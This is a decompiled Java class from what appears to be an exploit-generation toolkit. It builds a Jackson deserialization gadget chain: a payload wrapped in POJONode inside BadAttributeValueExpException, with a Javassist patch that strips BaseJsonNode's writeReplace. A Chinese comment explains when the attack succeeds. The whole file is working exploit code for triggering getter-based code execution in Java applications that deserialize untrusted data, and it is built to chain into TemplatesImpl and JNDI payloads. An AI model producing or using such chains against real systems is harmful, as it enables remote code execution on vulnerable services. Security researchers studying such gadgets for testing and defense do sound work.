package com.ar3h.chains.gadget.impl.javanative.jackson;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.util.Reflections;
import com.fasterxml.jackson.databind.node.POJONode;
import java.util.HashMap;
import javassist.ClassPool;
import javassist.CtClass;
import javax.management.BadAttributeValueExpException;
import org.apache.logging.log4j.core.jackson.JsonConstants;

@GadgetAnnotation(name = "Jackson反序列化链", description = "BadAttributeValueExpException#readObject() => POJONode#toString() => getter，会不定顺序调用对象*所有字段*中的getter方法\n此链不稳定，因为获取的顺序会有一定的不稳定性，有时 outputProperties 会在 stylesheetDOM 之前，这个时候反序列化攻击可以成功", dependencies = {"com.fasterxml.jackson.core:jackson-databind>2.9"}, priority = 15)
@GadgetTags(tags = {Tag.JavaNativeDeserialize}, nextTags = {Tag.TemplatesImplWrapperChain, Tag.TemplatesImplChain, Tag.LdapAttributeChain, Tag.SignedObjectChain, Tag.MapMessageChain, Tag.DataSourceChains, Tag.DataSourceWrapperChain, "hutoolJndiDSFactory", "hutoolPooledDSFactory", "hutoolSimpleDSFactory"}, excludes = {Tag.NotForJackson})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/jackson/Jackson.class */
public class Jackson implements Gadget {
    public Object getObject(Object obj) throws Exception {
        POJONode pOJONode = new POJONode(obj);
        pre();
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException((Object) null);
        Reflections.setFieldValue(badAttributeValueExpException, "val", pOJONode);
        Reflections.setFieldValue(badAttributeValueExpException, "stackTrace", new StackTraceElement[0]);
        Reflections.setFieldValue(badAttributeValueExpException, "suppressedExceptions", null);
        Reflections.setFieldValue(badAttributeValueExpException, JsonConstants.ELT_CAUSE, null);
        HashMap hashMap = new HashMap();
        hashMap.put(obj, badAttributeValueExpException);
        return hashMap;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject(gadgetChain.doCreate(gadgetContext));
    }

    public void pre() {
        ClassPool classPool = ClassPool.getDefault();
        try {
            ClassLoader contextClassLoader = Thread.currentThread().getContextClassLoader();
            CtClass ctClass = classPool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
            ctClass.removeMethod(ctClass.getDeclaredMethod("writeReplace"));
            ctClass.toClass(contextClassLoader);
            ctClass.toClass(Class.forName("com.fasterxml.jackson.databind.node.BaseJsonNode").getClassLoader());
        } catch (Exception e) {
        }
    }
}
